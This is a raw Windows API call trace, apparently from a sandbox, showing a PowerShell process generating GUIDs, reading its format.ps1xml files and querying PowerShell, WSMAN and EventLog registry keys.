	[0761.045] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd6c45368, Data2=0xdc69, Data3=0x4935, Data4=([0]=0x8a, [1]=0x48, [2]=0x86, [3]=0x98, [4]=0x3, [5]=0x1d, [6]=0x3d, [7]=0xc9))) returned 0x0
	[0761.045] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf27701c0, Data2=0x4bd5, Data3=0x4788, Data4=([0]=0x8f, [1]=0x8c, [2]=0x31, [3]=0x41, [4]=0xe9, [5]=0x50, [6]=0x22, [7]=0xd0))) returned 0x0
	[0761.045] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe187f38d, Data2=0x139c, Data3=0x43bf, Data4=([0]=0x84, [1]=0x49, [2]=0x90, [3]=0x7d, [4]=0x59, [5]=0x2e, [6]=0x30, [7]=0x29))) returned 0x0
	[0761.045] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x3d95abf4, Data2=0x2d16, Data3=0x4aa8, Data4=([0]=0x80, [1]=0xc9, [2]=0x26, [3]=0xa7, [4]=0x93, [5]=0xb7, [6]=0x89, [7]=0xb))) returned 0x0
	[0761.045] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x92cc2488, Data2=0x615e, Data3=0x4c79, Data4=([0]=0xb8, [1]=0x33, [2]=0x2d, [3]=0x5, [4]=0xc0, [5]=0xd, [6]=0x93, [7]=0x8a))) returned 0x0
	[0761.045] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9880991, Data2=0x2911, Data3=0x4d84, Data4=([0]=0xb0, [1]=0xce, [2]=0xf2, [3]=0x7b, [4]=0x2d, [5]=0x80, [6]=0x3f, [7]=0x29))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2e8dd608, Data2=0x6b5e, Data3=0x470f, Data4=([0]=0x8e, [1]=0xa0, [2]=0x22, [3]=0xb6, [4]=0x5f, [5]=0x3f, [6]=0xf1, [7]=0x45))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x742dd810, Data2=0xfb93, Data3=0x4c97, Data4=([0]=0xb2, [1]=0x34, [2]=0xd4, [3]=0xe8, [4]=0x38, [5]=0x97, [6]=0x65, [7]=0x2a))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc6ffda14, Data2=0x326e, Data3=0x4a30, Data4=([0]=0x8a, [1]=0x16, [2]=0x49, [3]=0xa7, [4]=0x65, [5]=0xcb, [6]=0xbb, [7]=0xd4))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd5157a84, Data2=0x2789, Data3=0x4cf4, Data4=([0]=0x99, [1]=0xb9, [2]=0x89, [3]=0x18, [4]=0xe0, [5]=0xa0, [6]=0x27, [7]=0xd8))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfc3e5c21, Data2=0xfd84, Data3=0x4810, Data4=([0]=0xb5, [1]=0x6b, [2]=0xda, [3]=0x36, [4]=0x81, [5]=0x57, [6]=0xe8, [7]=0x70))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1c155e85, Data2=0x4c25, Data3=0x4c25, Data4=([0]=0x83, [1]=0xca, [2]=0x36, [3]=0x1e, [4]=0xf3, [5]=0x4f, [6]=0x24, [7]=0x3))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x22df359c, Data2=0xa770, Data3=0x492c, Data4=([0]=0xbe, [1]=0x40, [2]=0xca, [3]=0x30, [4]=0xb3, [5]=0x11, [6]=0x68, [7]=0x75))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1ec15010, Data2=0x2694, Data3=0x402d, Data4=([0]=0xac, [1]=0xe1, [2]=0xa7, [3]=0xdb, [4]=0x6d, [5]=0xb3, [6]=0x2b, [7]=0xc7))) returned 0x0
	[0761.046] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x429b0dc3, Data2=0xe651, Data3=0x41f6, Data4=([0]=0xbc, [1]=0x96, [2]=0xea, [3]=0x50, [4]=0xeb, [5]=0x54, [6]=0x3, [7]=0x1f))) returned 0x0
	[0761.047] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xebe3e06c, Data2=0x2909, Data3=0x4f4e, Data4=([0]=0xb3, [1]=0x9d, [2]=0x4b, [3]=0x17, [4]=0x71, [5]=0x28, [6]=0x71, [7]=0x2f))) returned 0x0
	[0761.048] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9664162d, Data2=0x3555, Data3=0x49ae, Data4=([0]=0xba, [1]=0x98, [2]=0xba, [3]=0x52, [4]=0xc3, [5]=0xc6, [6]=0xf3, [7]=0x86))) returned 0x0
	[0761.048] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6077f60e, Data2=0xc81, Data3=0x496c, Data4=([0]=0x9d, [1]=0xf6, [2]=0x2b, [3]=0xf4, [4]=0xab, [5]=0xa2, [6]=0x31, [7]=0x19))) returned 0x0
	[0761.048] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xeee73bf8, Data2=0x1fe3, Data3=0x4cab, Data4=([0]=0x8c, [1]=0x13, [2]=0x67, [3]=0x98, [4]=0xf4, [5]=0x4f, [6]=0x29, [7]=0xac))) returned 0x0
	[0761.048] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8a1bbc34, Data2=0x5d26, Data3=0x4edc, Data4=([0]=0xa9, [1]=0x80, [2]=0x56, [3]=0x63, [4]=0xc8, [5]=0xab, [6]=0x57, [7]=0xad))) returned 0x0
	[0761.048] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd6efcea6, Data2=0xd2a3, Data3=0x477d, Data4=([0]=0x89, [1]=0x37, [2]=0x2, [3]=0x66, [4]=0x68, [5]=0x19, [6]=0x4f, [7]=0xc1))) returned 0x0
	[0761.049] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x181bc0ec, Data2=0x53f9, Data3=0x40bd, Data4=([0]=0x94, [1]=0x4b, [2]=0xb0, [3]=0xb9, [4]=0x96, [5]=0x5e, [6]=0x98, [7]=0x79))) returned 0x0
	[0761.049] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1cdc13de, Data2=0x4535, Data3=0x4faf, Data4=([0]=0xb4, [1]=0x34, [2]=0xdb, [3]=0xfc, [4]=0xc2, [5]=0x88, [6]=0x59, [7]=0xa5))) returned 0x0
	[0762.298] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd4cf011c, Data2=0xacad, Data3=0x4d11, Data4=([0]=0xae, [1]=0xd3, [2]=0x86, [3]=0x47, [4]=0xbb, [5]=0x6e, [6]=0xe, [7]=0x88))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x73918a0, Data2=0xbc4c, Data3=0x48ea, Data4=([0]=0xad, [1]=0xb7, [2]=0x5f, [3]=0xb0, [4]=0xd4, [5]=0xf4, [6]=0x42, [7]=0x25))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xfcda2579, Data2=0xab07, Data3=0x47ab, Data4=([0]=0xba, [1]=0x45, [2]=0xbd, [3]=0x7b, [4]=0x66, [5]=0x73, [6]=0x8d, [7]=0x38))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9cd8b38f, Data2=0x55a7, Data3=0x465c, Data4=([0]=0x90, [1]=0x13, [2]=0x88, [3]=0xb3, [4]=0x8c, [5]=0xc, [6]=0x7b, [7]=0xa1))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa28c1444, Data2=0x2c80, Data3=0x46c7, Data4=([0]=0x89, [1]=0x70, [2]=0xd8, [3]=0xc5, [4]=0x4e, [5]=0x2d, [6]=0xce, [7]=0x6a))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4daf80aa, Data2=0xfebf, Data3=0x4cc0, Data4=([0]=0x93, [1]=0x74, [2]=0xd7, [3]=0x9d, [4]=0xa9, [5]=0x2a, [6]=0x87, [7]=0x75))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa293e80b, Data2=0xbf6f, Data3=0x4971, Data4=([0]=0x81, [1]=0x9b, [2]=0x3d, [3]=0x9f, [4]=0x83, [5]=0x3c, [6]=0x1a, [7]=0x34))) returned 0x0
	[0762.299] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x57ce87a4, Data2=0x40ef, Data3=0x4b6a, Data4=([0]=0xa3, [1]=0x32, [2]=0xef, [3]=0x33, [4]=0x27, [5]=0xed, [6]=0xa3, [7]=0xb5))) returned 0x0
	[0762.300] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0762.300] GetFileType (hFile=0x318) returned 0x1
	[0762.300] SetErrorMode (uMode=0x1) returned 0x1
	[0762.300] GetFileType (hFile=0x318) returned 0x1
	[0762.300] ReadFile (in: hFile=0x318, lpBuffer=0x30fc910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x30fc910*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.301] ReadFile (in: hFile=0x318, lpBuffer=0x30fc910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x30fc910*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.301] ReadFile (in: hFile=0x318, lpBuffer=0x30fc910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x30fc910*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.302] ReadFile (in: hFile=0x318, lpBuffer=0x30fc910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x30fc910*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.308] ReadFile (in: hFile=0x318, lpBuffer=0x2f42e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f42e88*, lpNumberOfBytesRead=0xccf58*=0x8b4, lpOverlapped=0x0) returned 1
	[0762.308] ReadFile (in: hFile=0x318, lpBuffer=0x2f42afc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f42afc*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0762.308] ReadFile (in: hFile=0x318, lpBuffer=0x2f42e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f42e88*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0762.309] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0762.309] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0762.309] CoTaskMemAlloc (cb=0x5a) returned 0x1b805760
	[0762.309] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b805760, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0762.309] CoTaskMemFree (pv=0x1b805760) 
	[0762.309] RegCloseKey (hKey=0x318) returned 0x0
	[0762.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0762.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0762.310] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdf0674b, Data2=0x32a8, Data3=0x4610, Data4=([0]=0x83, [1]=0x17, [2]=0x6d, [3]=0x4b, [4]=0x2d, [5]=0x8, [6]=0xf2, [7]=0x52))) returned 0x0
	[0762.310] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x3e1c9f1, Data2=0x9341, Data3=0x4bf4, Data4=([0]=0xb0, [1]=0x89, [2]=0x9a, [3]=0x24, [4]=0x91, [5]=0x20, [6]=0xd4, [7]=0x68))) returned 0x0
	[0762.310] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0762.310] GetFileType (hFile=0x318) returned 0x1
	[0762.310] SetErrorMode (uMode=0x1) returned 0x1
	[0762.311] GetFileType (hFile=0x318) returned 0x1
	[0762.311] ReadFile (in: hFile=0x318, lpBuffer=0x2f79918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f79918*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.311] ReadFile (in: hFile=0x318, lpBuffer=0x2f79918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f79918*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.312] ReadFile (in: hFile=0x318, lpBuffer=0x2f79918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f79918*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.312] ReadFile (in: hFile=0x318, lpBuffer=0x2f79918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f79918*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0762.312] ReadFile (in: hFile=0x318, lpBuffer=0x2f79918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f79918*, lpNumberOfBytesRead=0xccf58*=0xe98, lpOverlapped=0x0) returned 1
	[0762.312] ReadFile (in: hFile=0x318, lpBuffer=0x2f78f18, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f78f18*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0762.312] ReadFile (in: hFile=0x318, lpBuffer=0x2f79918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x2f79918*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0762.313] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0762.313] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0762.313] CoTaskMemAlloc (cb=0x5a) returned 0x1b805760
	[0762.313] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b805760, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0762.313] CoTaskMemFree (pv=0x1b805760) 
	[0762.313] RegCloseKey (hKey=0x318) returned 0x0
	[0762.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0762.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0762.314] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa38020c1, Data2=0x9ed5, Data3=0x4ced, Data4=([0]=0x90, [1]=0xb1, [2]=0x3f, [3]=0xc9, [4]=0x61, [5]=0x3, [6]=0x90, [7]=0xae))) returned 0x0
	[0762.314] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe4a48814, Data2=0xeea8, Data3=0x42b8, Data4=([0]=0x8f, [1]=0x14, [2]=0x32, [3]=0xb8, [4]=0x43, [5]=0x4f, [6]=0x95, [7]=0xcf))) returned 0x0
	[0762.331] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.332] CoTaskMemFree (pv=0x27bac0) 
	[0762.332] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.332] CoTaskMemFree (pv=0x27bac0) 
	[0762.332] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.333] CoTaskMemFree (pv=0x27bac0) 
	[0762.333] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.333] CoTaskMemFree (pv=0x27bac0) 
	[0762.336] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.336] CoTaskMemFree (pv=0x27bac0) 
	[0762.337] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.337] CoTaskMemFree (pv=0x27bac0) 
	[0762.337] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0762.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.337] CoTaskMemFree (pv=0x27bac0) 
	[0763.289] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1f8 | out: phkResult=0xcd1f8*=0x318) returned 0x0
	[0763.290] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0763.290] CoTaskMemFree (pv=0x0) 
	[0763.290] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0763.290] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x2c73a0, lpcchValueName=0xcd1a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd1a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0763.290] CoTaskMemFree (pv=0x2c73a0) 
	[0763.291] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0763.291] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x2c73a0, lpcchValueName=0xcd1a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd1a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0763.291] CoTaskMemFree (pv=0x2c73a0) 
	[0763.291] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0763.291] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x2c73a0, lpcchValueName=0xcd1a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd1a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0763.291] CoTaskMemFree (pv=0x2c73a0) 
	[0763.291] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd18c, lpData=0x0, lpcbData=0xcd188*=0x0 | out: lpType=0xcd18c*=0x1, lpData=0x0, lpcbData=0xcd188*=0x8) returned 0x0
	[0763.291] CoTaskMemAlloc (cb=0xc) returned 0x32dd50
	[0763.291] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd15c, lpData=0x32dd50, lpcbData=0xcd158*=0x8 | out: lpType=0xcd15c*=0x1, lpData="2.0", lpcbData=0xcd158*=0x8) returned 0x0
	[0763.292] CoTaskMemFree (pv=0x32dd50) 
	[0772.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd148 | out: phkResult=0xcd148*=0x2ec) returned 0x0
	[0772.620] RegQueryInfoKeyW (in: hKey=0x2ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd04c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd048, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd04c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd048*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0772.621] CoTaskMemFree (pv=0x0) 
	[0772.621] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0772.621] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x0, lpValueName=0x2c73a0, lpcchValueName=0xcd0f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd0f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0772.621] CoTaskMemFree (pv=0x2c73a0) 
	[0772.621] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0772.621] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x1, lpValueName=0x2c73a0, lpcchValueName=0xcd0f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd0f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0772.621] CoTaskMemFree (pv=0x2c73a0) 
	[0772.621] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0772.621] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x2, lpValueName=0x2c73a0, lpcchValueName=0xcd0f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd0f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0772.621] CoTaskMemFree (pv=0x2c73a0) 
	[0772.621] RegQueryValueExW (in: hKey=0x2ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd0dc, lpData=0x0, lpcbData=0xcd0d8*=0x0 | out: lpType=0xcd0dc*=0x1, lpData=0x0, lpcbData=0xcd0d8*=0x8) returned 0x0
	[0772.621] CoTaskMemAlloc (cb=0xc) returned 0x32dd10
	[0772.621] RegQueryValueExW (in: hKey=0x2ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd0ac, lpData=0x32dd10, lpcbData=0xcd0a8*=0x8 | out: lpType=0xcd0ac*=0x1, lpData="2.0", lpcbData=0xcd0a8*=0x8) returned 0x0
	[0772.621] CoTaskMemFree (pv=0x32dd10) 
	[0772.623] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0772.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.623] CoTaskMemFree (pv=0x27bac0) 
	[0772.629] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0772.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.629] CoTaskMemFree (pv=0x27bac0) 
	[0772.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd178 | out: phkResult=0xcd178*=0x324) returned 0x0
	[0772.639] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0772.639] CoTaskMemFree (pv=0x0) 
	[0772.640] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.637] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.638] CoTaskMemFree (pv=0x2c73a0) 
	[0774.638] CoTaskMemFree (pv=0x0) 
